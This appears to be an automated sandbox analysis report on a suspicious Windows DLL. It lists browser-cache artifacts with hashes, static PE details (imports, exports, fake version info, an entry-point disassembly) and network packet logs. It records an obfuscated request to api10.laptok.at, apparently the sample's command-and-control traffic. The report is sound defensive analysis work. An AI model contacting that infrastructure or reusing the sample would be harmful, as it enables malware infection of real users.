                                                                                                                                                                                                    SSDEEP:384:7IPFhwGyK16xlANXd2j/RE9kYgo7jE/BpTZ2pK5olFh0UU:7IPwGy61Uj297gvT6KKT6UU
                                                                                                                                                                                                    MD5:AD771B594D8435B72EC3C554C8D24559
                                                                                                                                                                                                    SHA1:EF20299A044277D48BA2F7A48DAD911C9203961E
                                                                                                                                                                                                    SHA-256:3C22853E71F5E3D4E9720B982F816E98A9CFCA3283DBC850807874B376E6EBDE
                                                                                                                                                                                                    SHA-512:EF68769687686F4CE35982762F1BBDA9914CAC0A37E5CCC9B807BE61A2723588500D73EA8D634437B5AD988BD9A40B2A5BE56387AD5F2AB9650616324F290C79
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHqH1.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHsLz[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):12591
                                                                                                                                                                                                    Entropy (8bit):7.942751758062402
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:e3evveR9Fe3y6lrnll2Rz2opUvmofaLA9:eOv+cCmrnll2hZC1h
                                                                                                                                                                                                    MD5:A19E613EE2A01161681B815588E1A4B1
                                                                                                                                                                                                    SHA1:336D67A56FB76BAEB035AEAB1401A373E4A85C63
                                                                                                                                                                                                    SHA-256:358BDE094168889AB6FED6D0E5BFB5782BACD098EFED88A75A6D36D934ED8682
                                                                                                                                                                                                    SHA-512:ADD2F1000B06DAAC98739A9733E08BD57AEEDEA7EC6AB40DB8700CE012A4C2C0E2E746CA40F772535A66DEDF76B590119B55067D23C648D647E8C9959EA8F3C8
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHsLz.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=291&y=163
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHvHH[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):14186
                                                                                                                                                                                                    Entropy (8bit):7.959477143047502
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:edHxnWnPFkPgL7JAh8Ikr3e3QW6QKMG298bs5zr:edHVok4Lt6soh38A5f
                                                                                                                                                                                                    MD5:83D2849669D6CED53D3D12F06F5EC8DF
                                                                                                                                                                                                    SHA1:653C48E1F00FE4F687018E252726D862B70FC738
                                                                                                                                                                                                    SHA-256:9D299D31BBC1C2CAE83CF102535C81A25773E8C75D8657E25F7AB354DACDBBE7
                                                                                                                                                                                                    SHA-512:2EA6267118E732BDC0D82BFAAF6DD96F7BEF28C256613C0ED8233CB5A6CBC0A1D5158C0BBF5C5552644A1C7CA0DF783DABDEEC6E134190DE3E1754B9A8E782E7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHvHH.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=176&y=219
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1kc8s[1].png
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):799
                                                                                                                                                                                                    Entropy (8bit):7.616735751178749
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:6v/7ee//6FAU+ZPhOPnAgOydY9vYyfS1Y+OyGo0VtgzKkcbqeGOrlkTR+a1eXGyI:QGp+Zpajd4/ObGPngzKkcOSnGLT
                                                                                                                                                                                                    MD5:2C55F358C8213245D8DE540D89B76ED0
                                                                                                                                                                                                    SHA1:413A0EA00DBB2A54C6A3933B8864E1847D795124
                                                                                                                                                                                                    SHA-256:D11901D46370D97173C94754B69E90D7540FAF1F5C571C5E521E3A062FBF0A77
                                                                                                                                                                                                    SHA-512:0385C2FE61CFFF69EE6A85D13003B4729B93132007294DF3407DAAB97318157C421940D689E01B6CE5360A57029393FEAB949A83647DF22D43DF5064E7B82DD0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true&u=true&n=true&w=30&h=30
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBUE92F[1].png
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):708
                                                                                                                                                                                                    Entropy (8bit):7.5635226749074205
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:6v/78/gMGkt+fwrs8vYfbooyBf1e7XKH5bp6z0w6TDy9xB0IIDtqf/bU9Fqj1yfd:XGVw9oiNH5pbPDy9xmju/AXEyfYFW
                                                                                                                                                                                                    MD5:770E05618413895818A5CE7582D88CBA
                                                                                                                                                                                                    SHA1:EF83CE65E53166056B644FFC13AF981B64C71617
                                                                                                                                                                                                    SHA-256:EEC4AB26140F5AEA299E1D5D5F0181DDC6B4AC2B2B54A7EE9E7BA6E0A4B4667D
                                                                                                                                                                                                    SHA-512:B01D7D84339D5E1B3958E82F7679AFD784CE1323938ECA7C313826A72F0E4EE92BD98691F30B735A6544543107B5F5944308764B45DB8DE06BE699CA51FF7653
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBUE92F.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBVuddh[1].png
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):304
                                                                                                                                                                                                    Entropy (8bit):6.758580075536471
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:6v/lhPkR/ChmU5nXyNbWgaviGjZ/wtDi6Xxl32inTvUI8zVp:6v/78/e5nXyNb4lueg32au/
                                                                                                                                                                                                    MD5:245557014352A5F957F8BFDA87A3E966
                                                                                                                                                                                                    SHA1:9CD29E2AB07DC1FEF64B6946E1F03BCC0A73FC5C
                                                                                                                                                                                                    SHA-256:0A33B02F27EE6CD05147D81EDAD86A3184CCAF1979CB73AD67B2434C2A4A6379
                                                                                                                                                                                                    SHA-512:686345FD8667C09F905CA732DB98D07E1D72E7ECD9FD26A0C40FEE8E8985F8378E7B2CB8AE99C071043BCB661483DBFB905D46CE40C6BE70EEF78A2BCDE94605
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBkwUr[1].png
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):431
                                                                                                                                                                                                    Entropy (8bit):7.092776502566883
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:6v/78/kFkUgT6V0UnwQYst4azG487XqYsT:YgTA0UnwMM487XqZT
                                                                                                                                                                                                    MD5:D59ADB8423B8A56097C2AE6CBEDBEC57
                                                                                                                                                                                                    SHA1:CAFB3A8ABA2423C99C218C298C28774857BEBB46
                                                                                                                                                                                                    SHA-256:4CC08B49D22AF4993F4B43FD05DE6E1E98451A83B3C09198F58D1BAFD0B1BFC3
                                                                                                                                                                                                    SHA-512:34001CBE0731E45FB000E31E45C7D7FEE039548B3EA91EBE05156A4040FA45BC75062A0077BF15E0D5255C37FE30F5AE3D7F64FDD10386FFBB8FDB35ED8145FC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\TspIchn[1].htm
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):339392
                                                                                                                                                                                                    Entropy (8bit):5.999967656351339
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:cDJl443S9YbS47Fk3Zsv12tXBQWgy01CGFSpjYC5osGAEcJMizvDupzStPX56:cB35u8u6vMFgy0cWUGlMv65oXM
                                                                                                                                                                                                    MD5:415DBB7F17A00913790F8E99ADBB9D93
                                                                                                                                                                                                    SHA1:C7D1A1B88A46A1E65B109257BFFFB5259900AF17
                                                                                                                                                                                                    SHA-256:3A7B725B6B273BFCFDBEC5A06868562AD848034EFBA247BE5739858768FC3B0A
                                                                                                                                                                                                    SHA-512:39C6EB2B71D0D68E0AEAC7DF2CCBDA743633A94895D90DC2569D866F1490A33200BEB29AC31573F2814E78487FF6FC50D492AC049213C8542ACE6BF23F24D048
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:http://api10.laptok.at/api1/9a3FdV_2FOe2lNWBzywhye/a2rzbdQuOhRbh/1tMI9TP_/2FFHpcEjc2zIsj3nY_2FaRD/bbKOnK6Aw9/T9Li8ZpaG0hs_2FEE/_2B0kgl3vplN/HPMJmXJvTbm/kjHzz19HUtkaT1/4BDTN7ZVSNKtMR3H5nP4a/s8_2F3CxujepwtCo/By36bxNYadNwz_2/FEk2aSXfXLicJH7n4U/7D_2FTfi5/cc2nrD5Ag2qXRkQmnDt6/1GTWH5aoTuyoAdeDUx1/UqFEv13ML45n9P1f5D7a2h/spqio1V138YVU/_2FSoCJL/_2BPfPH_2FwmC1xDPsgb90b/lJFlQYaXBd/gV1Ci2eCEez/TspIchn
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\a8a064[1].gif
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:GIF image data, version 89a, 28 x 28
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):16360
                                                                                                                                                                                                    Entropy (8bit):7.019403238999426
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
                                                                                                                                                                                                    MD5:3CC1C4952C8DC47B76BE62DC076CE3EB
                                                                                                                                                                                                    SHA1:65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
                                                                                                                                                                                                    SHA-256:10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
                                                                                                                                                                                                    SHA-512:5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\e151e5[1].gif
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                    Entropy (8bit):3.122191481864228
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:CUTxls/1h/:7lU/
                                                                                                                                                                                                    MD5:F8614595FBA50D96389708A4135776E4
                                                                                                                                                                                                    SHA1:D456164972B508172CEE9D1CC06D1EA35CA15C21
                                                                                                                                                                                                    SHA-256:7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
                                                                                                                                                                                                    SHA-512:299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\fcmain[1].js
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):38376
                                                                                                                                                                                                    Entropy (8bit):5.066252643555933
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:768:P1avn4u3hPPXW94h8zpEMv/YXf9wOBEZn3SQN3GFl295ok6elGjBQ6elyska:dQn4uRHWmh8zmMv/YXf9wOBEZn3SQN3X
                                                                                                                                                                                                    MD5:49E3474775215A51371E367C126F9019
                                                                                                                                                                                                    SHA1:CF5F7BFA8269CC48FECDFD090F21EAC2DE919F89
                                                                                                                                                                                                    SHA-256:B76068D72395ACEA32BA01DA392E2B5F7548DCFEE41BD2399C8C6EE2DC421335
                                                                                                                                                                                                    SHA-512:E06E55EA0C1C4F19617216BBD90BBE5CFD9F5DB1A7D955404FC234F64A6DE27D566478955FE8AAED01B8E8A3278F1F9CC994217D9519E88B458E421AE9C6812B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=722878611&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1613420770406645614&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\fcmain[2].js
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):38874
                                                                                                                                                                                                    Entropy (8bit):5.051913931467512
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:768:p1av44u3hPPxW94hWGa7ExEuaYXf9wOBEZn3SQN3GFl295o2/8lAbA/r/8lA/sZ3:7Q44uRhWmhJaoxEuaYXf9wOBEZn3SQND
                                                                                                                                                                                                    MD5:5422169F2532AF7A6AB1A7E7A47A845D
                                                                                                                                                                                                    SHA1:A95093FE1000E3CD26ED718B5D9977F930D16460
                                                                                                                                                                                                    SHA-256:23DDE90088FF386A38825FB403E99DFE70AC6A40293EC8142F4F0CB9DC937F77
                                                                                                                                                                                                    SHA-512:C54015A07068E087D3E62171165CE0E14E0E2286F3A5BE90DC67528FAAB55FB57093091234F9736659D7DF20EFFDB3B4A14B0B5E6DBAAB3B8B27B865656B1C87
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=858412214&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1613420770839298944&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd

Static File Info

General

File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.790725842982734
TrID:
• Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
• Generic Win/DOS Executable (2004/3) 0.20%
• DOS Executable Generic (2002/1) 0.20%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: NJPcHPuRcG.dll
File size: 360448
MD5: 48ac334e786156ef605b82dd563373f4
SHA1: 1710cf3539eaaf618a613e690157adf30550fade
SHA256: 71b928fd0b29e21bbfa4755b5347f4dc40653a82ec7ecf4947e325dbec23abaa
SHA512: e32f9f05ede3025e108f307f6c76bd95b00dadb64e5cc45e78793e8bf97c929ba26802f7bff8d27b570459df695f4e3e67cd2e6b7563055cdc895530d7ce557c
SSDEEP: 6144:+87Sm49lFRQSAe5klIQm3n/ym1grjpY7nf9fv3lYdkv+hgG2KnG4r/gU:Wm+3QSAdm3n/yogZgJv3Gqv0gG2uG4jv
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.6.&.X.&.X.&.X..F%.>.X..F6...X..F5...X./...#.X.&.Y.I.X..F*.'.X..F".'.X..F$.'.X..F .'.X.Rich&.X.........PE..L....Z.E...........

File Icon

Icon Hash: 74f0e4ecccdce0e4

Static PE Info

General

Entrypoint: 0x100285d5
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x10000000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp: 0x45C55A8A [Sun Feb 4 04:01:14 2007 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: e0e710d4ed87ec11636d345dba071187

Entrypoint Preview

Instruction
cmp dword ptr [esp+08h], 01h
jne 00007FDAE4A29AF7h
call 00007FDAE4A328A0h
push dword ptr [esp+04h]
mov ecx, dword ptr [esp+10h]
mov edx, dword ptr [esp+0Ch]
call 00007FDAE4A299E2h
pop ecx
retn 000Ch
mov eax, dword ptr [esp+04h]
xor ecx, ecx
cmp eax, dword ptr [100503A0h+ecx*8]
je 00007FDAE4A29B04h
inc ecx
cmp ecx, 2Dh
jl 00007FDAE4A29AE3h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007FDAE4A29AFEh
push 0000000Dh
pop eax
ret
mov eax, dword ptr [100503A4h+ecx*8]
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
ret
call 00007FDAE4A302E8h
test eax, eax
jne 00007FDAE4A29AF8h
mov eax, 10050508h
ret
add eax, 08h
ret
call 00007FDAE4A302D5h
test eax, eax
jne 00007FDAE4A29AF8h
mov eax, 1005050Ch
ret
add eax, 0Ch
ret
push esi
call 00007FDAE4A29ADCh
mov ecx, dword ptr [esp+08h]
push ecx
mov dword ptr [eax], ecx
call 00007FDAE4A29A82h
pop ecx
mov esi, eax
call 00007FDAE4A29AB5h
mov dword ptr [eax], esi
pop esi
ret
push ebp
mov ebp, esp
sub esp, 48h
mov eax, dword ptr [10050514h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
push ebx
xor ebx, ebx
push esi
mov esi, dword ptr [ebp+08h]
cmp dword ptr [esi+14h], ebx
push edi
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-24h], ebx
mov dword ptr [ebp-1Ch], ebx
mov dword ptr [ebp-28h], ebx

Rich Headers

Programming Language:
• [RES] VS2005 build 50727
• [ C ] VS2005 build 50727
• [EXP] VS2005 build 50727
• [C++] VS2005 build 50727
• [ASM] VS2005 build 50727
• [LNK] VS2005 build 50727
• [IMP] VS2008 SP1 build 30729

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x4f020 | 0x93 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4e754 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb1000 | 0x4d0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb2000 | 0x1c98 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3e220 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4cc28 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3e000 | 0x1b4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3c44c | 0x3d000 | False | 0.709152471824 | data | 6.87914884899 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x3e000 | 0x110b3 | 0x12000 | False | 0.671671549479 | data | 6.38365470065 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x50000 | 0x604c8 | 0x4000 | False | 0.558715820312 | COM executable for DOS | 5.48871661926 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0xb1000 | 0x4d0 | 0x1000 | False | 0.150146484375 | data | 1.65729733757 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb2000 | 0x2c74 | 0x3000 | False | 0.485595703125 | data | 4.83368153083 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xb10a0 | 0x2b0 | data | English | United States
RT_MANIFEST | 0xb1350 | 0x17d | XML 1.0 document text | English | United States

Imports

DLL | Import
KERNEL32.dll | ExitProcess, GetFileAttributesA, CreateProcessA, GetSystemDirectoryA, GetEnvironmentVariableA, MultiByteToWideChar, GetShortPathNameA, CopyFileA, GetTempFileNameA, LoadLibraryA, WaitForMultipleObjects, GetModuleFileNameA, VirtualProtect, GetCurrentProcessId, CompareStringW, CompareStringA, CreateFileA, SetStdHandle, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, ReadFile, GetLocaleInfoW, IsValidCodePage, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, WideCharToMultiByte, InterlockedIncrement, InterlockedDecrement, InterlockedCompareExchange, InterlockedExchange, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLastError, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetTimeFormatA, GetDateFormatA, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCommandLineA, GetVersionExA, HeapAlloc, GetProcessHeap, GetCPInfo, RaiseException, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, HeapReAlloc, GetProcAddress, GetModuleHandleA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetACP, GetOEMCP, GetTimeZoneInformation, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, HeapSize, GetUserDefaultLCID, SetEnvironmentVariableA
WS2_32.dll | ioctlsocket, inet_ntoa, WSAStartup, recvfrom, ntohl, inet_addr, htons, WSACleanup, recv, socket, getservbyname, send, getsockopt, listen

Exports

Name | Ordinal | Address
DllRegisterServer | 1 | 0x10021230
Exactnature | 2 | 0x10021130
Happenthousand | 3 | 0x100215a0
Probablepath | 4 | 0x10021650

Version Infos

Description | Data
LegalCopyright | Copyright Strongimagine 1996-2016
FileVersion | 8.3.8.121
CompanyName | Strongimagine
ProductName | Room know
ProductVersion | 8.3.8.121 Soundbank
FileDescription | Room know
OriginalFilename | Sing.dll
Translation | 0x0409 0x04e4

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Network Port Distribution

TCP Packets

                                                                                                                                                                                                    Feb 15, 2021 21:26:17.004103899 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:17.004138947 CET44349748151.101.1.44192.168.2.5
                                                                                                                                                                                                    Feb 15, 2021 21:26:17.004247904 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:17.004285097 CET49748443192.168.2.5151.101.1.44
                                                                                                                                                                                                    Feb 15, 2021 21:26:17.023570061 CET49748443192.168.2.5151.101.1.44

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 15, 2021 21:25:56.284198046 CET	53	63183	8.8.8.8	192.168.2.5
Feb 15, 2021 21:25:57.168649912 CET	60151	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:25:57.220179081 CET	53	60151	8.8.8.8	192.168.2.5
Feb 15, 2021 21:25:58.194308043 CET	56969	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:25:58.247823954 CET	53	56969	8.8.8.8	192.168.2.5
Feb 15, 2021 21:25:59.202315092 CET	55161	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:25:59.262110949 CET	53	55161	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:00.204469919 CET	54757	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:00.257827997 CET	53	54757	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:03.868232012 CET	49992	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:03.931744099 CET	53	49992	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:05.465224981 CET	60075	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:05.522725105 CET	53	60075	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:05.789064884 CET	55016	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:05.837735891 CET	53	55016	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:06.485084057 CET	64345	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:06.534570932 CET	53	64345	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:06.564721107 CET	57128	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:06.632179022 CET	53	57128	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:09.017072916 CET	54791	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:09.076967955 CET	53	54791	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:09.495734930 CET	50463	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:09.550903082 CET	53	50463	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:09.783668995 CET	50394	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:09.847328901 CET	53	50394	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:11.728142977 CET	58530	53	192.168.2.5	8.8.8.8
Feb 15, 2021 21:26:11.795772076 CET	53	58530	8.8.8.8	192.168.2.5
Feb 15, 2021 21:26:14.101337910 CET	53813	53	192.168.2.5	8.8.8.8
